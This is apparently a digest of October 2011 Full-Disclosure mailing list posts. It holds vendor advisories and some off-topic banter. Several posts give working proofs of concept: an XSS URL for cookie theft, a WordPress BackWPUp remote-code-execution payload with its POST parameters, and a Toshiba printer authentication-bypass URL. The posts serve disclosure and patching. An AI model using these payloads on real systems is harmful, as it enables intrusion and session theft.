[Full-disclosure] http://anti-virus.cloudflare.com XSS(Cross Site Scripting) Vulnerability
0×1 Site : *http://anti-virus.cloudflare.com* 0×3 Author : *Sandeep Kamble* 0×4 Reported : October 12, 2011 0×6 Public Release : October 17 2011 0×7 Status: Fixed *Description : * *Anti-virus.cloudflare.com* is a service for avoiding spams . This project to stop attacks and educate visitors with infected computers about how they can clean up their machines. *Affected Variable :* * ?b_src=* *Exploit :* Executing Javascript using the vulnerable variable called as ?b_src= . This attack is commonly know as Cross Site Scripting (XSS) Anti-virus.cloud + affected script having stored Xss attack which can used for the grabbing the cookies . POC : http://anti-virus.cloudflare.com/cdn-cgi/anti-virus-challenge?h=772e6578706c6f69742d64622e636f6d2c6578706c6f69742d64622e636f6dx=f1cd78c0ef2c1d7505afe19491fa0477 b_src=scriptalert(’Document.cookie’)/script Sandeep Kamble www.sandeepkamble.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
On Sun, Oct 16, 2011 at 7:10 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: He already talks about how he's already thought about that in a prior article: http://gawker.com/5850025/right+wing-rabble+rouser-leaks-thousands-of-occupy-wall-street-emails Lol Best of luck to him (he's playing a dangerous game). Does the Darwin Awards have a category for dumb computer related decisions? Jeff -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Jeffrey Walton Sent: Sunday, October 16, 2011 4:05 PM To: Ivan . Cc: full-disclosure Subject: Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD On Sun, Oct 16, 2011 at 6:56 PM, Ivan . ivan...@gmail.com wrote: http://gawker.com/5850054/meet-the-guy-who-snitched-on-occupy-wall- street-to-the-fbi-and-nypd Thomas Ryan is definitely not the brightest fellow in computer security: We have been heavily monitoring Occupy Wall Street, and Anonymous. Aaron Barr did similar, ruined the company he worked for (HBGary Federal) and lost his job in the process. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Breaking the links: Exploiting the linker
CVEs have now been assigned to the two previously reported bugs as follows: 1) http://www.nth-dimension.org.uk/downloads.php?id=83 - Privesc attack using DB2 from normal user to root, the PoC is for Linux but based on testing the AIX version looks iffy too although I couldn't get gcc to generate a valid library to exploit it. CVE-2011-4061. FWIW I now have a version of the exploit for this working on AIX, based on a copy of kbbacf1 from IBM Tivoli Monitoring 6.1.0.6. It therefore appears that the vulnerable version of kbbacf1 isn't just shipped with DB2. 2) http://www.nth-dimension.org.uk/downloads.php?id=80 - Generic attack on the QNX runtime linker which abuses an arbitrary file overwrite and race condition to get root. CVE-2011-4060. Cheers, Tim -- Tim Brown mailto:t...@nth-dimension.org.uk http://www.nth-dimension.org.uk/ signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] foofus.net security advisory - Toshiba EStudio Multifunction Printer Authentication Bypass
Foofus.net Security Advisory: foofus-20111016 Title: Toshiba EStudio Multifunction Printer Authentication Bypass Version:e-Studio series devices Vendor: Toshiba Release Date: 01/29/2010 Issue Status: Contacted by Vendor on 2/25/2011 about release of a firmware patch. 1. Summary: Toshiba e-Studio devices found to be vulnerable to an authentication bypass vulnerability. 2. Description: The authentication is easily bypassed by adding a extra / in the URL after TopAccess. Example: http://IP Address/TopAccess//Administrator/Setup/ScanToFile/List.htm 3. Impact: Exploiting this allows an adversary to gain access to the device via the web management interface without authenticating. 4. Affected Products: All e-Studio devices tested against have been found to be vulnerable as of July 2011. Validation of specific firmware versions have not been conducted. This is due to limited access to devices Note: It is possible devices with latest release of firmware may not be vulnerable. These have not been tested. 5. Solution: Contact vendor and request firmware upgrade to patch security issue. 6) Time Table: 01/29/2011 Reported Vulnerability. 02/25/2011 Vendor acknowledged issue and stated firmware patch would soon be available March - July 2011 continued attempts to contact vendor to confirm firmware patch. Request were never answered. 10/16/2011 Publishes Advisory 7) Credits: Discovered by Deral Heiland PercX 8. Reference: http://praeda.foofus.net http://www.foofus.net/?page_id=411 The Foofus.Net team is an assortment of security professionals located through out the United States. http://www.foofus.net Follow percX on Twitter @Percent_X ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WordPress Plugin BackWPUp 2.1.4 - Security Advisory - SOS-11-012
Sense of Security - Security Advisory - SOS-11-012
Release Date. 17-Oct-2011
Vendor Notification Date. 14-Oct-2011
Product. BackWPUp
Platform. WordPress
Affected versions. 2.1.4
Severity Rating. High
Impact.System access
Attack Vector. Remote without authentication
Solution Status. Upgrade to 2.1.5
CVE reference. Not yet assigned
Details.
A vulnerability has been discovered in the WordPress plugin BackWPup
2.1.4 which can be exploited to execute local or remote code on the
web server.
There is a lack of data validation on the BackWPUpJobTemp POST
parameter of job/wp_export_generate.php allowing an attacker to
specify FTP resources as input.
This resource is downloaded and deserialised by the wp_export_generate.php
script and variables from this deserialisation are later passed to
require_once.
Proof of Concept.
=
Upload the following to a publicly accessible FTP server and
name it file.txt.running.
a:2:{s:7:WORKING;a:1:{s:5:NONCE;s:3:123;}s:8:ABS_PATH;s:25:
data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=;}
This serialised string creates an array containing:
$infile['WORKING'] = array();
$infile['WORKING']['NONCE'] = '123';
$infile['ABS_PATH'] =
'data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=';
Once uploaded ensure the FTP file is writeable and issue a POST to
job/wp_export_generate.php with the following parameters:
$_POST['BackWPupJobTemp'] = ftp://user:password@10.2.0.128/file.txt;;
$_POST['nonce'] = '123';
$_POST['type'] = 'getxmlexport';
The string included in $infile['ABS_PATH'] will then have wp-load.php
appended to it and passed to require_once.
In the above example the code contained in the base64 encoded string will
then be executed. The above code executes .phpinfo(); die();..
allow_URL_include will need to be on to allow to allow for remote file
inclusion, however local file inclusion could easily be achieved by using
null byte injection.
Solution.
=
Upgrade to BackWPUp 2.1.5 of above.
Discovered by.
Phil Taylor from Sense of Security Labs.
About us.
Sense of Security is a leading provider of information security and risk
management solutions. Our team has expert skills in assessment and
assurance,
strategy and architecture, and deployment through to ongoing management.
We are Australia's premier application penetration testing firm and trusted
IT security advisor to many of the country.s largest organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: i...@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-012.pdf
Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Announcement] ClubHack Magazine - Call for Articles
Hello All, And ClubHack Mag is seeking submissions for next issue, Issue22-November 2011. Seeking articles on following topics:- - Forensics and Anti-Forensics - Mobile, Telecom Hacking and Security ClubHack Magazine has as different sections: 1.Tech Gyan - Main article of the magazine. Covers various technical aspects in security, latest hacking trends and techniques. 2. Tool Gyan - Covers various hacking and security tools. 3. Mom's Guide - Dedicated to common man. Covers basics and fundamentals. 4. Legal Gyan - IT Law with respect to hacking explained in simple language. 5. Matriux Vibhag - Articles on Matriux Security Distro. *You too can design and submit poster for the magazine! Few guidelines : 1) Keep the language as easy as possible. Screen shots will be of help. 2) Along with article send us your photograph and small intro. 3) Submissions due date - 25th of this month Send in your articles to abhij...@clubhack.com Regards, Abhijeet Patil, Co-Founder, CHMag URL: http://chmag.in http://clubhack.com Cell: +91-9923800379 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpMyAdmin 3.4.5 – Full path disclosure in phpmyadmin.css.php
phpMyAdmin 3.4.5 suffers of insufficient input validation of the parameter js_frame in phpmyadmin.css.php, exposing information that could be used in further attacks. CVE Entry: CVE-2011-3646 CWE: CWE-20, CWE-200 PMASA ENTRY: PMASA-2011-15 = Description The script returns an error message, containing the full path if the js_frame parameter is defined as an array. = Exploit No authentication needed to exploit this vulnerability. http://example.com/path_to_phpmyadmin/phpmyadmin.css.php?js_frame[]=right = Official fix http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commitdiff;h=d35cba980893aa6e6455fd6e6f14f3e3f1204c52 = Credits Discovered by Mihail Ursu ( http://securitate.md/ ) on 12 Sep 2011. = Disclosure Timeline Reported to vendor on 12 Sep 2011. Confirmation from vendor 21 Sep 2011. Patch confirmation 4 Oct 2011. Official fix and public disclosure 17 Oct 2011. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said: Does the Darwin Awards have a category for dumb computer related decisions? Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect-- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made. Having said that. I suppose it *is* possible. Consider the (hiopefully hypothetical) example of an expreme overclocker who does something predictably stupid and ends up with a lapful of liquid nitrogen and a case of severe frostbite. Gives a whole new meaing to shatter attack ;) Yeah, *that* would get a Darwin. ;) pgpcwqxcj3zRn.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:151 ] libpng
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:151 http://www.mandriva.com/security/ ___ Package : libpng Date: October 17, 2011 Affected: 2010.1, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in libpng: The png_format_buffer function in pngerror.c in libpng allows remote attackers to cause a denial of service (application crash) via a crafted PNG image that triggers an out-of-bounds read during the copying of error-message data. NOTE: this vulnerability exists because of a CVE-2004-0421 regression (CVE-2011-2501). Buffer overflow in libpng, when used by an application that calls the png_rgb_to_gray function but not the png_set_expand function, allows remote attackers to overwrite memory with an arbitrary amount of data, and possibly have unspecified other impact, via a crafted PNG image (CVE-2011-2690). The png_err function in pngerror.c in libpng makes a function call using a NULL pointer argument instead of an empty-string argument, which allows remote attackers to cause a denial of service (application crash) via a crafted PNG image (CVE-2011-2691). NOTE: This does not affect the binary packages in Mandriva, but could affect users if PNG_NO_ERROR_TEXT is defined using the libpng-source-1.?.?? package. The png_handle_sCAL function in pngrutil.c in libpng does not properly handle invalid sCAL chunks, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a crafted PNG image that triggers the reading of uninitialized memory (CVE-2011-2692). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2501 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2690 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2691 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2692 ___ Updated Packages: Mandriva Linux 2010.1: 75cf5cc9e56f7cd3c621ea2ba8899df3 2010.1/i586/libpng3-1.2.43-1.2mdv2010.2.i586.rpm af2f3f6696d67efd19d2bf7cc30207da 2010.1/i586/libpng-devel-1.2.43-1.2mdv2010.2.i586.rpm 5190271f8394e5114aeb3b9de6a679bc 2010.1/i586/libpng-source-1.2.43-1.2mdv2010.2.i586.rpm 3d7b05502fd2c613f6e263c2bc4baf51 2010.1/i586/libpng-static-devel-1.2.43-1.2mdv2010.2.i586.rpm 4d26abf5f53ddfb40af4432b2ffe7215 2010.1/SRPMS/libpng-1.2.43-1.2mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 3a8041586d3f6a3666231ec9744efa30 2010.1/x86_64/lib64png3-1.2.43-1.2mdv2010.2.x86_64.rpm 3baefc4e0b5f560382ef411349142810 2010.1/x86_64/lib64png-devel-1.2.43-1.2mdv2010.2.x86_64.rpm 63db8d8b4313907f1b7d18ac4cf7c30f 2010.1/x86_64/lib64png-static-devel-1.2.43-1.2mdv2010.2.x86_64.rpm bb8d9ac1982ae3591e701f1e32193733 2010.1/x86_64/libpng-source-1.2.43-1.2mdv2010.2.x86_64.rpm 4d26abf5f53ddfb40af4432b2ffe7215 2010.1/SRPMS/libpng-1.2.43-1.2mdv2010.2.src.rpm Mandriva Enterprise Server 5: 2dc72977964282d6b9b71f02daf11875 mes5/i586/libpng3-1.2.31-2.4mdvmes5.2.i586.rpm 3a7a29b3ce673a6023b2ebd69702de77 mes5/i586/libpng-devel-1.2.31-2.4mdvmes5.2.i586.rpm 311e83f11ecca6e10492be05e93af450 mes5/i586/libpng-source-1.2.31-2.4mdvmes5.2.i586.rpm 6e78659cd2132ab936672d26307508c3 mes5/i586/libpng-static-devel-1.2.31-2.4mdvmes5.2.i586.rpm 7716bbc53dbf07a4bcf647d19c872321 mes5/SRPMS/libpng-1.2.31-2.4mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 30fbcd1e778a334751efb67347896a74 mes5/x86_64/lib64png3-1.2.31-2.4mdvmes5.2.x86_64.rpm 98f8b1bcae2ca325b95d84b03a8a21c3 mes5/x86_64/lib64png-devel-1.2.31-2.4mdvmes5.2.x86_64.rpm 8388f578116a05c96b2ef54120b0966a mes5/x86_64/lib64png-static-devel-1.2.31-2.4mdvmes5.2.x86_64.rpm e92d9e5a9d2cec26614e0073bf8772a4 mes5/x86_64/libpng-source-1.2.31-2.4mdvmes5.2.x86_64.rpm 7716bbc53dbf07a4bcf647d19c872321 mes5/SRPMS/libpng-1.2.31-2.4mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
On Mon, Oct 17, 2011 at 06:03, valdis.kletni...@vt.edu wrote: On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said: Does the Darwin Awards have a category for dumb computer related decisions? Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect-- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made. Having said that. I suppose it *is* possible. Consider the (hiopefully hypothetical) example of an expreme overclocker who does something predictably stupid and ends up with a lapful of liquid nitrogen and a case of severe frostbite. Gives a whole new meaing to shatter attack ;) Yeah, *that* would get a Darwin. ;) I have heard rumors of an instance that would qualify: Supposedly there was a fellow who knew he was under police surveillance for bad computing behavior of some sort or another, and had prepared for a raid by outfitting his residence with video cameras, and his computer with a kill switch. Little did he know that he was more literal than expected. He had packed the computer case full of thermite, rather than simply putting an ounce or three on top of the hard drive. He was next to the computer when noticed a raid descending, and he hit the kill switch. There wasn't much left of the room he was in... I've not been able to verify this story, but it does come from a source that I consider reliable. Kurt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
--On October 17, 2011 9:03:21 AM -0400 valdis.kletni...@vt.edu wrote: On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said: Does the Darwin Awards have a category for dumb computer related decisions? Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect-- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made. OTOH, don't you think someone who qualifies for a Darwin Award has demonstrated a mental deficiency? -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
On Mon, 17 Oct 2011 10:32:04 CDT, Paul Schmehl said: OTOH, don't you think someone who qualifies for a Darwin Award has demonstrated a mental deficiency? There's a difference between not having any brains and not using what you got. http://www.darwinawards.com/rules/rules4.html The candidate must be capable of sound judgment. Humans are generally capable of sound judgment, except those with mental handicaps that render them unable to fully comprehend the ramifications of their actions. Departing the gene pool in a spectacularly stupid way because you *can't* think it through is just a sad event. Doing it because you *didn't bother* thinking it through is Darwin Award fodder. Somebody mentioned a (probably apocryphal) incident using thermite - that's a good example. The person was *aware* that thermite burns *really hot*, and didn't take proper care. This is a totally different situation from some poor soul with Down's Syndrome, who sees thermite burn once, and thinks it's *really* pretty and decides to light some himself... pgpqtiZrEQ2n8.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
I don't think I have any mental deficiency, but I've certainly done things that almost got me a Darwin Award. I think momentary lack of reason better describes it. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Paul Schmehl Sent: Monday, October 17, 2011 8:32 AM To: valdis.kletni...@vt.edu; noloa...@gmail.com Cc: full-disclosure Subject: Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD --On October 17, 2011 9:03:21 AM -0400 valdis.kletni...@vt.edu wrote: On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said: Does the Darwin Awards have a category for dumb computer related decisions? Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect-- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made. OTOH, don't you think someone who qualifies for a Darwin Award has demonstrated a mental deficiency? -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:152 ] ncompress
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:152 http://www.mandriva.com/security/ ___ Package : ncompress Date: October 17, 2011 Affected: 2010.1, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in ncompress: An integer underflow leading to array index error was found in the way gzip used to decompress files / archives, compressed with the Lempel-Ziv-Welch (LZW) compression algorithm. A remote attacker could provide a specially-crafted LZW compressed gzip archive, which once decompressed by a local, unsuspecting user would lead to gzip crash, or, potentially to arbitrary code execution with the privileges of the user running gzip (CVE-2010-0001). The updated packages have been upgraded to the 4.2.4.4 version which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001 ___ Updated Packages: Mandriva Linux 2010.1: 21d31dc01147a832568ca56e1dd61447 2010.1/i586/ncompress-4.2.4.4-0.1mdv2010.2.i586.rpm ba9d02cc91a5ebb50e0f8d4c63cb23ec 2010.1/SRPMS/ncompress-4.2.4.4-0.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: d289f3b0e72026349addcaa45c92bb95 2010.1/x86_64/ncompress-4.2.4.4-0.1mdv2010.2.x86_64.rpm ba9d02cc91a5ebb50e0f8d4c63cb23ec 2010.1/SRPMS/ncompress-4.2.4.4-0.1mdv2010.2.src.rpm Mandriva Enterprise Server 5: 82d9b6490242cb9257f186f0cfcb682e mes5/i586/ncompress-4.2.4.4-0.1mdvmes5.2.i586.rpm 564695e65868d680d3b218307b24189a mes5/SRPMS/ncompress-4.2.4.4-0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: bc945e39f76a798f5010aa541647cd8c mes5/x86_64/ncompress-4.2.4.4-0.1mdvmes5.2.x86_64.rpm 564695e65868d680d3b218307b24189a mes5/SRPMS/ncompress-4.2.4.4-0.1mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFOnC1TmqjQ0CJFipgRApjMAJsGcaAY2/rFacsCr2KD3+x9ob++6wCgz0RH nV9S5cL4mECq3np/6SUF/zI= =1ouk -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:153 ] libxfont
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:153 http://www.mandriva.com/security/ ___ Package : libxfont Date: October 17, 2011 Affected: 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: A vulnerability has been discovered and corrected in libxfont: The LZW decompressor in (1) the BufCompressedFill function in fontfile/decompress.c in X.Org libXfont before 1.4.4 and (2) compress/compress.c in 4.3BSD, as used in zopen.c in OpenBSD before 3.8, FreeBSD, NetBSD, FreeType 2.1.9, and other products, does not properly handle code words that are absent from the decompression table when encountered, which allows context-dependent attackers to trigger an infinite loop or a heap-based buffer overflow, and possibly execute arbitrary code, via a crafted compressed stream, a related issue to CVE-2006-1168 and CVE-2011-2896 (CVE-2011-2895). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2895 ___ Updated Packages: Mandriva Linux 2010.1: 482f9f25111c17bbf7eab3e526c02d2a 2010.1/i586/libxfont1-1.4.1-1.1mdv2010.2.i586.rpm e53b66dcacc6908578d2d663fc0b4e32 2010.1/i586/libxfont1-devel-1.4.1-1.1mdv2010.2.i586.rpm dcd75b98bf6482c3134374fba85ef8d5 2010.1/i586/libxfont1-static-devel-1.4.1-1.1mdv2010.2.i586.rpm 071b839b9b387da16dbe28647169cdc6 2010.1/SRPMS/libxfont-1.4.1-1.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: ac85e7c0a994216ab4b01eaf068e7ed9 2010.1/x86_64/lib64xfont1-1.4.1-1.1mdv2010.2.x86_64.rpm be2ecb351d2af84eed831d4e4a8546cc 2010.1/x86_64/lib64xfont1-devel-1.4.1-1.1mdv2010.2.x86_64.rpm 12e8118fdefdb42aad4d8939da3ecdd5 2010.1/x86_64/lib64xfont1-static-devel-1.4.1-1.1mdv2010.2.x86_64.rpm 071b839b9b387da16dbe28647169cdc6 2010.1/SRPMS/libxfont-1.4.1-1.1mdv2010.2.src.rpm Mandriva Linux 2011: f0eb57ae377b67104ffd242ba2392fce 2011/i586/libxfont1-1.4.3-2.1-mdv2011.0.i586.rpm 6bfd3df3c8d48f791727eec9fda3291c 2011/i586/libxfont1-devel-1.4.3-2.1-mdv2011.0.i586.rpm d30dd3a4409786fdc28fe7a80321b931 2011/i586/libxfont1-static-devel-1.4.3-2.1-mdv2011.0.i586.rpm c0e1e359377d217e69f241e922bb3b0f 2011/SRPMS/libxfont-1.4.3-2.1.src.rpm Mandriva Linux 2011/X86_64: f1fd069f313ad2663a40b8ecab7fac18 2011/x86_64/lib64xfont1-1.4.3-2.1-mdv2011.0.x86_64.rpm c88a0f7e76b85c298691f94f3b47e343 2011/x86_64/lib64xfont1-devel-1.4.3-2.1-mdv2011.0.x86_64.rpm dd21bf4f4d2249dfcadecfa9e5b6fe27 2011/x86_64/lib64xfont1-static-devel-1.4.3-2.1-mdv2011.0.x86_64.rpm c0e1e359377d217e69f241e922bb3b0f 2011/SRPMS/libxfont-1.4.3-2.1.src.rpm Mandriva Enterprise Server 5: c771ee56c18d549596da16a5702b4eec mes5/i586/libxfont1-1.3.3-1.1mdvmes5.2.i586.rpm fd789a0970d76b2ebb65d80b0bd7644f mes5/i586/libxfont1-devel-1.3.3-1.1mdvmes5.2.i586.rpm 9b2dc8eca6bfb18747c3e245c93e3e66 mes5/i586/libxfont1-static-devel-1.3.3-1.1mdvmes5.2.i586.rpm ba3875d325e737d7f1bf9c5bb2c23bb3 mes5/SRPMS/libxfont-1.3.3-1.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 4f8d8287abfa8fba3bdc2b0046784a93 mes5/x86_64/lib64xfont1-1.3.3-1.1mdvmes5.2.x86_64.rpm 3c83c6510a09fa870cd04cf28ad172c9 mes5/x86_64/lib64xfont1-devel-1.3.3-1.1mdvmes5.2.x86_64.rpm f5a6a43b2a538ff55a517321c0b09391 mes5/x86_64/lib64xfont1-static-devel-1.3.3-1.1mdvmes5.2.x86_64.rpm ba3875d325e737d7f1bf9c5bb2c23bb3 mes5/SRPMS/libxfont-1.3.3-1.1mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFOnDB4mqjQ0CJFipgRAqNoAKDIbrW9UpQHZoiA4fN/Woh9lCgrEwCg0vAJ tmgY1uRlLS9/q+ma2hmCV7k= =IBKG -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -
[Full-disclosure] Disclosures on YouTube (Onaquad Systems Security)
List, I'll now be putting up my disclosures on YouTube a day or two before on full-disclosure. You can visit them here: http://www.youtube.com/user/onaquad under the title Onaquad Security. Hope you enjoy! I'll probably start posting the src of the code I use there here too. There is already some cool stuff there, tutorials and such, and some unique code. If there is anything there you'd like to have, you can email me about it. --oxagast ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AST-2011-012: Remote crash vulnerability in SIP channel driver
Asterisk Project Security Advisory - AST-2011-012 Product Asterisk Summary Remote crash vulnerability in SIP channel driver Nature of Advisory Remote crash Susceptibility Remote authenticated sessions SeverityCritical Exploits Known No Reported On October 4, 2011 Reported By Ehsan Foroughi Posted OnOctober 17, 2011 Last Updated On October 17, 2011 Advisory ContactTerry Wilson twil...@digium.com CVE NameCVE-2011-4063 Description A remote authenticated user can cause a crash with a malformed request due to an unitialized variable. Resolution Ensure variables are initialized in all cases when parsing the request. Affected Versions Product Release Series Asterisk Open Source 1.8.x All versions Asterisk Open Source10.x All versions (currently in beta) Corrected In Product Release Asterisk Open Source 1.8.7.1, 10.0.0-rc1 Patches Download URL Revision http://downloads.asterisk.org/pub/security/AST-2011-012-1.8.diff 1.8 http://downloads.asterisk.org/pub/security/AST-2011-012-10.diff 10 Links Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2011-012.pdf and http://downloads.digium.com/pub/security/AST-2011-012.html Revision History Date Editor Revisions Made Asterisk Project Security Advisory - AST-2011-012 Copyright (c) 2011 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:154 ] systemtap
